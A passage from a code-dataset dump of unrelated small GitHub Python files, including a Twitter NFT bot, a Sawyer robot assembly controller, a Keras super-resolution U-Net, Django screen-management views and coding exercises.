False\n\nprint(old35(3))\nprint(old35(10))\nprint(old35(15))\n","repo_name":"aamiriqbal071/CodingBat","sub_path":"Logic-1/old35.py","file_name":"old35.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37253184114","text":"import os.path\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\nSCOPES = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/spreadsheets']\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nSERVICE_ACCOUNT_FILE = os.path.join(BASE_DIR, 'credentials.json')\n\n# Set the path to your JSON file with the service account credentials\ncredentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# Authorize and open the spreadsheet\nservice = build('sheets', 'v4', credentials=credentials)\n\n# Specify the spreadsheet ID\nspreadsheet_id = '1cXcNL1WD8HWM_Q64881-1GHyvPb3KLbJzacGgLDMR18'\n\n# Set the cell range that holds the questions and answers\nrange_name = 'вопросы хищники!A3:C'\n\n\n# Function to fetch the questions and answers from the spreadsheet\ndef get_questions():\n    result = service.spreadsheets().values().get(spreadsheetId=spreadsheet_id, range=range_name).execute()\n    values = result.get('values', [])\n    return values\n","repo_name":"Alex85p/MoscowZooTGBot","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34184819472","text":"import tweepy\nfrom decouple import config\n\nimport json\nfrom datetime import datetime\nfrom time import sleep\n\n#today's date\ntoday_date = datetime.now().date()\n\n#open data\nf= open(f'api/data/{today_date}-nfts-daily.json') #* path \n\n#twitter credentials\nAPI_KEY = config('TWITTER_API_KEY')\nAPI_KEY_SECRET = config('API_KEY_SECRET')\nACCESS_TOKEN = config('ACCESS_TOKEN')\nACCESS_TOKEN_SECRET = config('ACCESS_TOKEN_SECRET')\n\n\n\nauth = tweepy.OAuthHandler(API_KEY, API_KEY_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\ntry:\n    api.verify_credentials()\n    print(\"Authentication Successful\")\nexcept:\n    print(\"Authentication Error\")\n\n\ndef tweet_data():\n    data = json.load(f)\n    n = len(data)\n    print(n)\n    while n > 0:\n        n-=1\n        try:\n            for each in [data[n]]:\n                tweet=f'''{each['nft_name']} sold for {each['price']} {each['date']} \\nLink: {each['nft_url']}'''\n                #print(tweet)\n                sleep(1)\n                api.update_status(tweet)\n        except tweepy.TweepyException as e:\n            print(e)\n            sleep(2)\n\nif __name__ == '__main__':\n    tweet_data()","repo_name":"vantage-ola/dailyNFTs-Bot","sub_path":"tweet/send_data.py","file_name":"send_data.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40018184005","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import interpolate\nx = np.asarray([0, 11, 25, 39, 53, 63])\ny = x**2\np = np.arange(4)\np_avg = np.sum(p)\np_6 = np.insert(p,[0,4],p_avg)\n\n\nf = interpolate.interp1d(x, p_6)\n\nxnew = np.arange(0, 64, 1)\nynew = f(xnew) # use interpolation function returned by `interp1d`\nplt.plot(x, y, 'o', xnew, ynew, '-')\nplt.show()\n","repo_name":"lsy105/symbol_detection","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18668361478","text":"from django.urls import path\n\nfrom ordersapp.views import OrderListView, OrderCreateView, OrderUpdateView, OrderDelete, order_forming_complete, \\\n    OrderDetail, get_product_price\n\napp_name = 'ordersapp'\n\nurlpatterns = [\n    path('', OrderListView.as_view(), name='order_list'),\n    path('create/', OrderCreateView.as_view(), name='order_create'),\n    path('edit//', OrderUpdateView.as_view(), name='order_update'),\n    path('delete//', OrderDelete.as_view(), name='order_delete'),\n    path('complete//', order_forming_complete, name='order_forming_complete'),\n    path('detail//', OrderDetail.as_view(), name='order_detail'),\n    path('product//price/', get_product_price, name='get_product_price')\n\n]\n","repo_name":"Kllraz/geekshop","sub_path":"ordersapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30183648845","text":"def add_function(numbers: list):\n    sums = 0\n    for i in numbers:\n        sums += i\n    return sums\n\n\ndef multiply_function(numbers: list):\n    multiply = 1\n    for total in numbers:\n        multiply *= total\n    return multiply\n\n\ndef largest_function(numbers: list):\n    largest = numbers[0]\n    for number in numbers:\n        if number > largest:\n            largest = number\n    return largest\n\n\ndef smallest_function(numbers: list):\n    smallest = numbers[0]\n    for number in numbers:\n        if number < smallest:\n            smallest = number\n    return smallest\n\n\ndef no_duplicate(numbers):\n    unique_value = []\n    for number in numbers:\n        if number not in unique_value:\n            unique_value.append(number)\n    return unique_value\n\n\ndef triple_element(numbers):\n    tripled_value = []\n    for number in numbers:\n        tripled_value.append(number ** 3)\n    return tripled_value\n","repo_name":"Favourmbata/python-project","sub_path":"tests/list_exercise.py","file_name":"list_exercise.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25308895413","text":"import warnings\n\nimport neurokit2 as nk\nimport numpy as np\nimport pandas as pd\nfrom tpcp import make_action_safe\n\nfrom empkins_micro.feature_extraction.pep.algorithms.base_extraction import BaseExtraction\n\n\nclass QPeakExtraction_NeurokitDwt(BaseExtraction):\n    \"\"\"algorithm to extract Q-wave peaks (= R-wave onset) from ECG signal using neurokit ecg_delineate function with\n    discrete wavelet method\"\"\"\n\n    @make_action_safe\n    def extract(self, signal_clean: pd.Series, heartbeats: pd.DataFrame, sampling_rate_hz: int):\n        \"\"\"function which 
extracts Q-wave peaks from given ECG cleaned signal\n\n Args:\n signal_clean:\n cleaned ECG signal\n heartbeats:\n pd.DataFrame containing one row per segmented heartbeat, each row contains start, end, and R-peak\n location (in samples from beginning of signal) of that heartbeat, index functions as id of heartbeat\n sampling_rate_hz:\n sampling rate of ECG signal in hz\n\n Returns:\n saves resulting Q-peak locations (samples) in points_ attribute of super class (in the row of the heartbeat\n to which the respective Q-peak corresponds), index is heartbeat id,\n NaN when no Q-peak could be detected in that heartbeat\n \"\"\"\n\n # result df\n q_peaks = pd.DataFrame(index=heartbeats.index, columns=[\"q_peak\"])\n\n # used subsequently to store ids of heartbeats for which no AO or IVC could be detected\n heartbeats_no_q = []\n heartbeats_q_after_r = []\n\n # some neurokit functions (for example ecg_delineate()) don't work with r-peaks input as Series, so list instead\n r_peaks = list(heartbeats[\"r_peak_sample\"])\n\n _, waves = nk.ecg_delineate(signal_clean, rpeaks=r_peaks, sampling_rate=sampling_rate_hz, method=\"dwt\",\n show=False, show_type=\"peaks\") # show can also be set to False\n\n extracted_q_peaks = waves[\"ECG_Q_Peaks\"]\n\n # find heartbeat to which Q-peak belongs and save Q-peak position in corresponding row\n for idx, q in enumerate(extracted_q_peaks):\n\n # for some heartbeats, no Q can be detected, will be NaN in resulting df\n if np.isnan(q):\n heartbeats_no_q.append(idx)\n else:\n heartbeat_idx = heartbeats.loc[(heartbeats[\"start_sample\"] < q) & (q < heartbeats[\"end_sample\"])].index[0]\n\n # Q occurs after R, which is not valid\n if heartbeats[\"r_peak_sample\"].loc[heartbeat_idx].item() < q:\n heartbeats_q_after_r.append(heartbeat_idx)\n q_peaks.at[heartbeat_idx, \"q_peak\"] = np.NaN\n\n # valid Q-peak found\n else:\n q_peaks.at[heartbeat_idx, \"q_peak\"] = q\n\n # inform user about missing Q-values\n if q_peaks.isna().sum()[0] > 0:\n nan_rows = q_peaks[q_peaks[\"q_peak\"].isna()]\n nan_rows.drop(index=heartbeats_q_after_r, inplace=True)\n nan_rows.drop(index=heartbeats_no_q, inplace=True)\n warnings.warn(f\"No Q-peak detected in {q_peaks.isna().sum()[0]} heartbeats (for heartbeats \"\n f\"{heartbeats_no_q} the neurokit algorithm was not able to detect a Q-peak; for heartbeats \"\n f\"{heartbeats_q_after_r} the detected Q is invalid because it occurs after R; for \"\n f\"{nan_rows.index.values} apparently none of the found Q-peaks were within these heartbeats)\")\n\n self.points_ = q_peaks\n return self\n","repo_name":"empkins/empkins-micro","sub_path":"empkins_micro/feature_extraction/pep/algorithms/ecg/extraction_q_peak_neurokit_dwt.py","file_name":"extraction_q_peak_neurokit_dwt.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13074049109","text":"# coding=utf-8\n\nimport rospy\nimport math\n\nimport moveit_commander\nimport moveit_msgs.msg\n\nfrom math import pi\nfrom scipy.spatial.transform import Rotation as R\nfrom moveit_commander.conversions import pose_to_list\n\nimport intera_interface\nimport intera_external_devices\nfrom intera_interface import CHECK_VERSION\n\nimport numpy as np\nimport geometry_msgs.msg\nfrom geometry_msgs.msg import (\n PoseStamped,\n Pose,\n Point,\n Quaternion,\n)\nfrom std_msgs.msg import Header\nfrom sensor_msgs.msg import JointState\nfrom voice.msg import VoiceMsg\n\nfrom intera_core_msgs.srv import (\n SolvePositionIK,\n 
SolvePositionIKRequest,\n)\n\n\ndef all_close(goal, actual, tolerance):\n    if type(goal) is list:\n        for index in range(len(goal)):\n            if abs(actual[index] - goal[index]) > tolerance:\n                return False\n\n    elif type(goal) is geometry_msgs.msg.PoseStamped:\n        return all_close(goal.pose, actual.pose, tolerance)\n\n    elif type(goal) is geometry_msgs.msg.Pose:\n        return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)\n\n    return True\n\n\n\n\n\nclass MoveGroupPythonIntefaceTutorial(object):\n    \"\"\"MoveGroupPythonIntefaceTutorial\"\"\"\n\n    def __init__(self):\n        super(MoveGroupPythonIntefaceTutorial, self).__init__()\n        joint_state_topic = ['joint_states:=/robot/joint_states']\n        moveit_commander.roscpp_initialize(joint_state_topic)\n\n        robot = moveit_commander.RobotCommander()\n        scene = moveit_commander.PlanningSceneInterface()\n\n        group_name = \"right_arm\"\n        move_group = moveit_commander.MoveGroupCommander(group_name)\n\n        display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',\n                                                       moveit_msgs.msg.DisplayTrajectory,\n                                                       queue_size=20)\n\n        # We can get the name of the reference frame for this robot:\n        planning_frame = move_group.get_planning_frame()\n        print(\"============ Planning frame: %s\" % planning_frame)\n\n        # We can also print the name of the end-effector link for this group:\n        eef_link = move_group.get_end_effector_link()\n        print(\"============ End effector link: %s\" % eef_link)\n\n        # We can get a list of all the groups in the robot:\n        group_names = robot.get_group_names()\n        # print(\"============ Available Planning Groups:\", robot.get_group_names())\n\n        # Sometimes for debugging it is useful to print the entire state of the\n        # robot:\n        # print(\"============ Printing robot state\")\n        # print(robot.get_current_state())\n\n        self.box_name = ''\n        self.robot = robot\n        self.scene = scene\n        self.move_group = move_group\n        self.display_trajectory_publisher = display_trajectory_publisher\n        self.planning_frame = planning_frame\n        self.eef_link = eef_link\n        self.group_names = group_names\n\n\nclass RobotInit(MoveGroupPythonIntefaceTutorial):\n    def __init__(self, speed=0.3):\n        super(RobotInit, self).__init__()\n        self.rs = intera_interface.RobotEnable(CHECK_VERSION)\n        init_state = self.rs.state().enabled\n        self.rp = intera_interface.RobotParams()\n        self.valid_limbs = self.rp.get_limb_names()\n        self.limb = intera_interface.Limb(self.valid_limbs[0])\n        self.joint_names = self.limb.joint_names()\n        self.limb.set_joint_position_speed(speed)\n        self.gripper = None\n        self.original_deadzone = None\n        self._rate = 500.0\n        self.rate = rospy.Rate(self._rate)\n        self.move_group.set_max_acceleration_scaling_factor(speed)\n        self.move_group.set_max_velocity_scaling_factor(speed)\n        self.cameras = intera_interface.Cameras()\n        self.right_camera_name = \"right_hand_camera\"\n        sub = rospy.Subscriber(\"voice\", VoiceMsg, self.voice_callback, queue_size=1, buff_size=1, tcp_nodelay=True)\n\n        self.response = None\n        self.trans_matrix = None\n\n        try:\n            self.gripper = intera_interface.Gripper(self.valid_limbs[0] + '_gripper')\n        except (ValueError, OSError) as e:\n            rospy.logerr(\"Could not detect an electric gripper attached to the robot.\")\n            self.clean_shutdown()\n\n    def set_detect_result(self, response):\n        self.response = response\n\n    def set_transmatrix(self, transmatrix):\n        self.trans_matrix = transmatrix\n\n    def change_speed(self, speed):  # change the joint speed (0-1)\n        self.limb.set_joint_position_speed(speed)\n\n    def clean_shutdown(self):  # set the gripper dead zone\n        if self.gripper and self.original_deadzone:\n            self.gripper.set_dead_zone(self.original_deadzone)\n        print(\"Exiting example.\")\n\n    def set_camera_gain(self, gain_value, camera_name=\"right_hand_camera\"):  # the head camera is head_camera\n        cameras = self.cameras\n        if cameras.set_gain(camera_name, gain_value):\n            rospy.loginfo(\"Gain set to: {0}\".format(cameras.get_gain(camera_name)))\n\n    # control the camera exposure\n    def set_camera_exposure(self, exposure_value, camera_name=\"right_hand_camera\"):  # the head camera is head_camera\n        cameras = self.cameras\n        if cameras.set_exposure(camera_name, exposure_value):\n            rospy.loginfo(\"Exposure set to: {0}\".format(cameras.get_exposure(camera_name)))\n\n    def go_to_camera_position(self):\n        joints_command = {'right_j0': -2.3301435546875, 'right_j1': -3.047884765625, 'right_j2': 1.4562392578125,\n                          'right_j3': -1.4219619140625, 'right_j4': 1.7223046875, 'right_j5': 0.00515625,\n                          'right_j6': 3.3662646484375}\n\n        self.limb.move_to_joint_positions(joints_command)\n\n    def control_gripper(self, cmd_pos, dead_zone=0.):  # 0~100 close~open\n        self.gripper.set_dead_zone(dead_zone)\n        # cmd_pos = max(min(self.gripper.get_position() + offset_pos, self.gripper.MAX_POSITION),\n        #               self.gripper.MIN_POSITION)\n        cmd_pos /= 2000.\n        self.gripper.set_position(cmd_pos)\n\n    def get_gripper_position(self):\n        return self.gripper.get_position()\n\n    def get_gripper_force(self):\n        return self.gripper.get_force()\n\n    def get_gripper_object_weight(self):  # right_hand:position, orientation\n        return self.gripper.get_object_weight()\n\n    def voice_callback(self, msg):\n        \"\"\"\n        rect round hex rect-b round-b hex-b\n        cl 0 1 2 3 4 5\n        v-order 2 3 4\n        @param msg:\n        @return:\n        \"\"\"\n        print('receive command is: {}.'.format(msg.order))\n\n        if msg.order == 2:\n            self.assembly_proc(0)\n        elif msg.order == 3:\n            self.assembly_proc(1)\n        elif msg.order == 4:\n            self.assembly_proc(2)\n\n    def moveit_move(self, position, orientation=None):\n        move_group = self.move_group\n        pose_goal = geometry_msgs.msg.Pose()\n        if orientation is not None:\n            pose_goal.orientation.x = orientation[0]\n            pose_goal.orientation.y = orientation[1]\n            pose_goal.orientation.z = orientation[2]\n            pose_goal.orientation.w = orientation[3]\n        else:\n            pose_goal.orientation.x = 0.707\n            pose_goal.orientation.y = -0.707\n            pose_goal.orientation.z = 0.0\n            pose_goal.orientation.w = 0.0\n\n        pose_goal.position.x = position[0]\n        pose_goal.position.y = position[1]\n        pose_goal.position.z = position[2]\n\n        move_group.set_pose_target(pose_goal)\n        plan = move_group.go(wait=True)\n        move_group.stop()\n        move_group.clear_pose_targets()\n        current_pose = self.move_group.get_current_pose().pose\n        return all_close(pose_goal, current_pose, 0.01)\n\n    def sawyer_ik_move(self, position, orientation=None):\n        ns = \"ExternalTools/\" + self.valid_limbs[0] + \"/PositionKinematicsNode/IKService\"\n        iksvc = rospy.ServiceProxy(ns, SolvePositionIK)\n        ikreq = SolvePositionIKRequest()\n        hdr = Header(stamp=rospy.Time.now(), frame_id='base')\n\n        if orientation is None:\n            orientation_ = Quaternion(x=0.707, y=-0.707, z=0.0, w=0.0, )\n        else:\n            orientation_ = Quaternion(x=orientation[0], y=orientation[1], z=orientation[2], w=orientation[3], )\n\n        poses = {'right': PoseStamped(header=hdr,\n                                      pose=Pose(position=Point(\n                                          x=position[0], y=position[1], z=position[2], ),\n                                          orientation=orientation_,\n                                      ), ), }\n        ikreq.pose_stamp.append(poses[self.valid_limbs[0]])\n        # Request inverse kinematics from base to \"right_hand\" link\n        ikreq.tip_names.append('right_hand')\n\n        try:\n            rospy.wait_for_service(ns, 5.0)\n            resp = iksvc(ikreq)\n        except (rospy.ServiceException, 
rospy.ROSException) as e:\n rospy.logerr(\"Service call failed: %s\" % (e,))\n return False\n\n if resp.result_type[0] > 0:\n seed_str = {\n ikreq.SEED_USER: 'User Provided Seed',\n ikreq.SEED_CURRENT: 'Current Joint Angles',\n ikreq.SEED_NS_MAP: 'Nullspace Setpoints',\n }.get(resp.result_type[0], 'None')\n rospy.loginfo(\"SUCCESS - Valid Joint Solution Found from Seed Type: %s\" %\n (seed_str,))\n # Format solution into Limb API-compatible dictionary\n limb_joints = dict(list(zip(resp.joints[0].name, resp.joints[0].position)))\n\n rospy.loginfo(\"\\nIK Joint Solution:\\n%s\", limb_joints)\n rospy.loginfo(\"------------------\")\n # rospy.loginfo(\"Response Message:\\n%s\", resp)\n self.limb.move_to_joint_positions(limb_joints)\n else:\n rospy.logerr(\"INVALID POSE - No Valid Joint Solution Found.\")\n rospy.logerr(\"Result Error %d\", resp.result_type[0])\n return False\n\n def get_cur_pos(self):\n return intera_interface.Limb(self.valid_limbs[0]).endpoint_pose()\n\n def adjust_det_pose(self, detect_position, bias):\n detect_position[0] += bias[0]\n detect_position[1] += bias[1]\n detect_position[2] += bias[2]\n\n return detect_position\n\n def assembly_proc(self, cl):\n if self.response is None or self.trans_matrix is None:\n print('detect result is not prepared')\n return\n\n detect_orientation = [0.0, 1.0, 0.0, 0.0]\n response = self.response\n\n workpiece_position = self.trans_matrix.dot([response[cl].pos_x, response[cl].pos_y, response[cl].pos_z, 1])\n print('workpiece: ', cl, response[cl].pos_x, response[cl].pos_y, response[cl].pos_z, response[cl].cl)\n print(workpiece_position)\n\n detect_position = np.array([workpiece_position[0], workpiece_position[1], workpiece_position[2]])\n detect_position = self.adjust_det_pose(detect_position, [-0.008, 0.015, 0.0])\n self.moveit_move(detect_position, detect_orientation)\n\n detect_position = self.adjust_det_pose(detect_position, [0., 0., -0.07])\n self.moveit_move(detect_position, detect_orientation)\n self.control_gripper(0)\n\n # detect_position = base_position\n detect_position = self.adjust_det_pose(detect_position, [0., 0., 0.40])\n self.moveit_move(detect_position, detect_orientation)\n print(\"*** grasp workpiece {} is finished\".format(cl))\n\n base_cl = cl + 3\n\n position = self.trans_matrix.dot([response[base_cl].pos_x, response[base_cl].pos_y, response[base_cl].pos_z, 1])\n base_detect_position = np.array([position[0], position[1], position[2]])\n\n if base_cl == 3:\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.008, 0.01, 0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.change_speed(0.02)\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.002, 0.005, -0.015])\n self.moveit_move(base_detect_position, detect_orientation)\n\n elif base_cl == 4:\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.008, 0.01, 0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n self.moveit_move(base_detect_position, detect_orientation)\n\n self.change_speed(0.02)\n base_detect_position = self.adjust_det_pose(base_detect_position, [-0.0015, 0.002, -0.015])\n self.moveit_move(base_detect_position, detect_orientation)\n\n elif base_cl == 5:\n base_detect_position = self.adjust_det_pose(base_detect_position, 
[-0.008, 0.01, 0.05])\n            self.moveit_move(base_detect_position, detect_orientation)\n\n            base_detect_position = self.adjust_det_pose(base_detect_position, [0., 0., -0.05])\n            self.moveit_move(base_detect_position, detect_orientation)\n\n            self.change_speed(0.02)\n            base_detect_position = self.adjust_det_pose(base_detect_position, [-0.002, 0.002, -0.015])\n            self.moveit_move(base_detect_position, detect_orientation)\n\n        self.control_gripper(100)\n        print(\"*** put in base {} is finished\".format(base_cl))\n        self.change_speed(0.3)\n        self.moveit_move(np.array([0.251, -0.154, 0.599]), detect_orientation)\n\n\n\nif __name__ == \"__main__\":\n    rospy.init_node(\"control_node\", anonymous=True)\n","repo_name":"sixgods66/work_on_sawyer","sub_path":"scripts/robot_utils.py","file_name":"robot_utils.py","file_ext":"py","file_size_in_byte":13797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2626005879","text":"import numpy as np\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras.layers import *\nfrom keras.models import Model\nfrom layers.pixel_shuffle import PixelShuffle\n\n\ndef BilinearUpSampling2D(stride, **kwargs):\n    def layer(x):\n        input_shape = K.int_shape(x)\n        output_shape = (stride[0] * input_shape[1], stride[1] * input_shape[2])\n        return tf.image.resize_bilinear(x, output_shape, align_corners=True)\n    return Lambda(layer, **kwargs)\n\n\ndef conv_block(x, filters=64, batch_norm=False):\n    x = Conv2D(filters, (3, 3), padding='same')(x)\n    if batch_norm:\n        x = BatchNormalization()(x)\n    x = ReLU()(x)\n    return x\n\n\ndef up_block(x, y, filters=64, batch_norm=False):\n    x = BilinearUpSampling2D((2, 2))(x)\n    x = Conv2D(filters, (3, 3), padding='same')(x)\n    if batch_norm:\n        x = BatchNormalization()(x)\n    x = ReLU()(x)\n    x = Concatenate()([x, y])\n    x = Conv2D(filters, (3, 3), padding='same')(x)\n    x = ReLU()(x)\n    x = Conv2D(filters, (3, 3), padding='same')(x)\n    if batch_norm:\n        x = BatchNormalization()(x)\n    x = ReLU()(x)\n    return x\n\n\ndef create_model(input_shape=(64, 64, 3), scale_factor=3):\n    '''\n    U-Net based architecture with skip connections and bilinear interpolation upsampling.\n    PixelShuffle is added as a final upsampling layer to enlarge to SR.\n    '''\n\n    img_input = Input(shape=input_shape)\n\n    # Encoder\n    enc1 = conv_block(img_input, 64)\n    enc1 = conv_block(enc1, 64)\n    down = MaxPooling2D()(enc1)\n\n    enc2 = conv_block(down, 128)\n    enc2 = conv_block(enc2, 128)\n    down = MaxPooling2D()(enc2)\n\n    enc3 = conv_block(down, 256)\n    enc3 = conv_block(enc3, 256)\n    down = MaxPooling2D()(enc3)\n\n    enc4 = conv_block(down, 512)\n    enc4 = conv_block(enc4, 512)\n    down = MaxPooling2D()(enc4)\n\n    enc5 = conv_block(down, 1024)\n    enc5 = conv_block(enc5, 1024)\n\n    # Center\n    cent = Conv2D(256, (1, 1))(enc5)\n    cent = ReLU()(cent)\n\n    # Decoder\n    dec = up_block(cent, enc4, 512)\n    dec = up_block(dec, enc3, 256)\n    dec = up_block(dec, enc2, 128)\n    dec = up_block(dec, enc1, 64)\n\n    dec = Conv2D(3 * (scale_factor ** 2), (3, 3), padding='same')(dec)\n    dec = PixelShuffle(r=scale_factor)(dec)\n    dec = Activation('sigmoid')(dec)\n\n    return Model(img_input, dec)\n","repo_name":"tomasmikeska/superresolution","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18854517480","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass 
Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='WorkImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', models.FileField(upload_to=b'work/images/')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('text', models.TextField(max_length=2000)),\n ('client', models.CharField(max_length=200)),\n ('role', models.CharField(max_length=500)),\n ('included', models.CharField(max_length=500)),\n ('url', models.CharField(max_length=300)),\n ('thumbnail', models.FileField(upload_to=b'work/thumbnails/')),\n ('pub_date', models.DateTimeField(auto_now_add=True)),\n ('image', models.ManyToManyField(to='works.WorkImage')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WorkType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('pub_date', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='workitem',\n name='type',\n field=models.ManyToManyField(to='works.WorkType'),\n preserve_default=True,\n ),\n ]\n","repo_name":"melnychukk18/portfolio","sub_path":"works/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32696644155","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\n\nfrom .models import *\n\nfrom .ssh_functions import ssh_send\n\n# devices\n\n@login_required\ndef list_devices(request):\n devices = Device.objects.all()\n return render(request, \"device_and_screen_management/devices/list.html\", {\"devices\": devices})\n\n@login_required\ndef view_device(request, device_id):\n device = Device.objects.get(id=device_id)\n return render(request, \"device_and_screen_management/devices/view.html\", {\"device\": device})\n\ndef restart_all_pages_for_device(request, device_id):\n device = Device.objects.get(id=device_id)\n channel_layer = get_channel_layer()\n for screen in device.screens.all(): async_to_sync(channel_layer.group_send)(f\"infoscreen_{screen.id}\", {\"type\": \"refresh\"})\n return redirect(\"view_device\", device_id=device_id)\n\ndef restart_device_service(request, device_id):\n device = Device.objects.get(id=device_id)\n if device.host_ip and device.ssh_private_key:\n ssh_send(device.host_ip, device.ssh_private_key, \"systemctl restart kiosk.service\")\n return redirect(\"view_device\", device_id=device_id)\n return render(request, \"errors/400.html\", status=400)\n\ndef restart_device(request, device_id):\n device = Device.objects.get(id=device_id)\n if device.host_ip and device.ssh_private_key:\n ssh_send(device.host_ip, device.ssh_private_key, \"reboot\")\n return redirect(\"view_device\", device_id=device_id)\n return render(request, \"errors/400.html\", status=400)\n\n\n# screens\n\n@login_required\ndef list_screens(request):\n screens = Screen.objects.all()\n return render(request, 
\"device_and_screen_management/screens/list.html\", {\"screens\": screens})\n\n@login_required\ndef view_screen(request, screen_id):\n screen = Screen.objects.get(id=screen_id)\n if request.POST:\n new_order = request.POST[\"new_order\"].split(\",\") # [1, 2, 3]\n for slideshow_id in new_order:\n screen_slideshows = screen.slideshow_schedules.filter(slideshow_id=slideshow_id)\n for screen_slideshow in screen_slideshows:\n screen_slideshow.screen_slideshow_order = new_order.index(slideshow_id) + 1\n screen_slideshow.save()\n return redirect(\"view_screen\", screen_id=screen_id)\n\n return render(request, \"device_and_screen_management/screens/view.html\", {\"screen\": screen})\n","repo_name":"Spillhuset/shinfo","sub_path":"src/apps/device_and_screen_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31041172492","text":"\"\"\"\nLinked List Cycle - Easy #141\n\nGiven a linked list, return a boolean indicating if there is a cycle\n\nExample:\n\nInput: \n1 -> 2 -> 3 -> 4 -> 5 -> 11 -> 6 -> 8 -> 9 -> 7\n ^ |\n | |\n -------------------------------------\n\nOutput:\nTrue\n\"\"\"\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n # slowPointer and fastPointer both start at the head\n slowPointer = head\n fastPointer = head\n\n # Loop until slowPointer, fasterPointer, or the node after fastPointer becomes null\n # We include fastPointer.next in this check because we'll need to move the pointer by 2 within the loop\n # fastPointer.next.next must be valid, otherwise point shifting will fail\n while slowPointer and fastPointer and fastPointer.next:\n # Move the fastPointer by 2 nodes, while moving the slowPointer by 1\n fastPointer = fastPointer.next.next\n slowPointer = slowPointer.next\n # Eventually, if slowPointer and fastPointer meets, we've found the loop\n if (slowPointer == fastPointer):\n return True\n\n return False\n\n\"\"\"\nTime Complexity : O(n)\nSpace Complexity: O(1)\n\"\"\"\n\ns = Solution()\n\nlist1 = ListNode(1)\nlist2 = ListNode(2)\nlist3 = ListNode(3)\nlist4 = ListNode(4)\nlist5 = ListNode(5)\nlist11 = ListNode(11)\nlist6 = ListNode(6)\nlist8 = ListNode(8)\nlist9 = ListNode(9)\nlist7 = ListNode(7)\n\nlist1.next = list2\nlist2.next = list3\nlist3.next = list4\nlist4.next = list5\nlist5.next = list11\nlist11.next = list6\nlist6.next = list8\nlist8.next = list9\nlist9.next = list7\nlist7.next = list3\n\nanswer = s.hasCycle(list1)\nprint(answer)","repo_name":"tmdenddl/Algorithm","sub_path":"Python/Data Strucutre Related Questions/Linked List/Linked List Cycle - Easy #141.py","file_name":"Linked List Cycle - Easy #141.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38474753460","text":"import os\nos.environ[\"in_bookish\"] = \"true\"\n\n# Custom RQ worker.\nfrom config import DevConfig, ProdConfig\nfrom tasks.util import get_job_entry, init_db_connection, set_config\nimport os\nimport sys\n\nconfig_class = DevConfig\nif len(sys.argv) > 1:\n\tmode = sys.argv[1]\n\tif mode == \"prod\":\n\t\tprint(\"Running in production mode.\")\n\t\tconfig_class = ProdConfig\n\telif mode == \"dev\":\n\t\tprint(\"Running in development 